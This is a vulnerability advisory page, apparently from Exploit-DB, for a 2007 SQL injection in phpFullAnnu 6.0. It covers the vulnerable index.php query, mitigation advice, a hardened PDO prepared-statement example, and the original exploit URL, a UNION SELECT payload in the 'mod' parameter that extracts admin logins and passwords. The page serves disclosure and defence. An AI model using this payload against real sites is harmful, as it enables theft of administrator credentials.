Vendor: PFA
Author: Inclusion Hunter Team
CVSS: 7.5 (HIGH)
Class: SQL Injection
CWE: 89
Product Name: PFA
Affected Version From: 6
Affected Version To: 6
Patch Exists: NO
Related CWE: (none listed)
CPE: a:pfa:pfa:6.0
Metasploit: (none listed)
Other Scripts: (none listed)
Platforms Tested: (none listed)
Year: 2007

phpFullAnnu (PFA) 6.0

The vulnerability allows an attacker to inject SQL code into the application through the unsanitised 'mod' GET parameter of index.php, potentially gaining unauthorized access to the database. The provided exploit URL demonstrates how to extract login credentials (the a_login and a_password columns) from the 'pfa_admin' table; the result is reflected in the page's <title> element. The exploit only works if the 'magic_quotes_gpc' setting is turned off, because with it enabled the single quote used to break out of the string literal would be escaped.

Mitigation:

To mitigate this vulnerability, enable the 'magic_quotes_gpc' setting so that special characters in user input are escaped automatically, or, preferably, use prepared statements and parameterized queries so that user input is never interpreted as SQL.
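The parameterized form of the affected index.php query, as an added example that is not PFA's own code: it uses PDO (PFA's own $bdd wrapper is not shown on the page), assumes a $pdo connection, a 'pfa_' table prefix matching the pfa_admin table named above, and a $title_site variable, and adds an allow-list for the module name plus output escaping for the <title>. Note that magic_quotes_gpc was removed in PHP 5.4, so binding parameters is the only durable fix.

```php
<?php
// Added example, not PFA's code. Column and table names (h_title, h_mod,
// <prefix>heading) follow the advisory; everything else here is assumed.

// Hardened replacement for the vulnerable line in index.php:
// $_GET['mod'] is bound as a parameter, so a quote in ?mod= is data,
// not SQL, regardless of the magic_quotes_gpc setting.
function headingTitle(PDO $pdo, string $tbprefix, string $mod): ?string
{
    // The prefix is configuration, not user input, so interpolating it is safe.
    $stmt = $pdo->prepare(
        "SELECT h_title FROM {$tbprefix}heading WHERE h_mod = :mod"
    );
    $stmt->execute([':mod' => $mod]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row['h_title'];
}

// Defence in depth: h_mod is a short module name, so reject anything else
// before it reaches the database (assumed allow-list pattern and fallback).
function moduleParam(array $get): string
{
    $mod = $get['mod'] ?? 'home';
    if (!is_string($mod) || !preg_match('/^[a-z0-9_]{1,32}$/', $mod)) {
        $mod = 'home';   // fall back on anything that is not a plain module name
    }
    return $mod;
}

// Assumed connection details; ERRMODE_EXCEPTION keeps query failures from
// silently returning an empty title, EMULATE_PREPARES=false forces real
// server-side prepared statements.
$pdo = new PDO('mysql:host=localhost;dbname=pfa;charset=utf8mb4', 'user', 'pass', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,
]);
$tbprefix   = 'pfa_';            // assumed, matching the pfa_admin table above
$title_site = 'My PFA site';     // assumed; set in PFA's configuration

$sqltitle = headingTitle($pdo, $tbprefix, moduleParam($_GET));

// Equivalent of /include/meta.inc.php, with the value escaped on output so
// a crafted h_title cannot inject markup into the page either.
echo '<title>',
     htmlspecialchars($title_site . ' - ' . ($sqltitle ?? ''), ENT_QUOTES, 'UTF-8'),
     '</title>';
```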

Exploit-DB raw data:

#########################################################################################
#
#        Inclusion Hunter Team
#        http://www.ihteam.net
#
#
#         [phpFullAnnu (PFA) 6.0]
#
#
# Class:     SQL Injection
# Found:     22/09/2007
# Remote:    Yes
# Site:      http://pfa.netsliver.com/
# Download:  http://pfa.netsliver.com/download/download.php?Fichier=pfa-v6.tgz
##########################################################################################



        Vulnerable code:
        index.php
============================================================================================================

$sqltitle = $bdd->readresult($bdd->request('SELECT h_title FROM '.$tbprefix.'heading WHERE h_mod = \''.$_GET['mod'].'\''));
[...]
//in /include/meta.inc.php
<title><?php echo $title_site, ' - ', $sqltitle;...
//So watch Title bar to see the injection
============================================================================================================



        Exploit (!!!WORK ONLY WITH magic_quotes_gpc = Off!!!):
===================================================================================================================

http://www.site.com/[path]/?lang=fr&mod=login' UNION ALL SELECT concat(a_login ,0x3a,a_password) FROM pfa_admin/*
===================================================================================================================



        Thanks To:
=================================
White_Sheep for his Bugs Hunter;
=================================

# milw0rm.com [2007-09-23]